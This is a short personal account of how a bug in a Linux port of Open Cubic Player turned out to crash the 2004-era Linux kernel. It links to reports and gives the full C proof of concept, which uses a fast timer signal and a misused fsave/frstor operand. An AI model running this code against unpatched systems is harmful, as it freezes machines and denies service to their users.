evil.c

The start

I once popped an idea into my head, I want to port Open Cubic Player to linux. I worked on it for months without even having a running program, just bits and pieces that compiled. And just in the time where I startet to get output onto my screen, I was about to port the last piece of code, the timers. And as I added more and more of the code, my PC suddently froze during one of the tests. I rebooted and tested again, and surely, it froze again. After several attempts at isolating the issue, I find the piece of code that made it happen. At first I though the issue was caused by a gcc bug, and that it exploited the a kernel bug. It later turned out that my code had a small bug in it, which gcc compiled happily, that exploited the kernel in a way not many people had thought about.

http://linuxreviews.org/features/2004-06-18_kernel_exploit_timeline/
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=15905"
https://lore.kernel.org/all/1701.83.109.60.63.1086814977.squirrel@nepa.nlc.no/

#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

static void Handler(int ignore)
{
        char fpubuf[108];
        __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
        write(2, "*", 1);
        __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf)); /*It should have been "m"(*fpubuf) in order to reference the memory correct */
}

int main(int argc, char *argv[])
{
        struct itimerval spec;
        signal(SIGALRM, Handler);
        spec.it_interval.tv_sec=0;
        spec.it_interval.tv_usec=100;
        spec.it_value.tv_sec=0;
        spec.it_value.tv_usec=100;
        setitimer(ITIMER_REAL, &spec, NULL);
        while(1)
                write(1, ".", 1);
        
        return 0;
}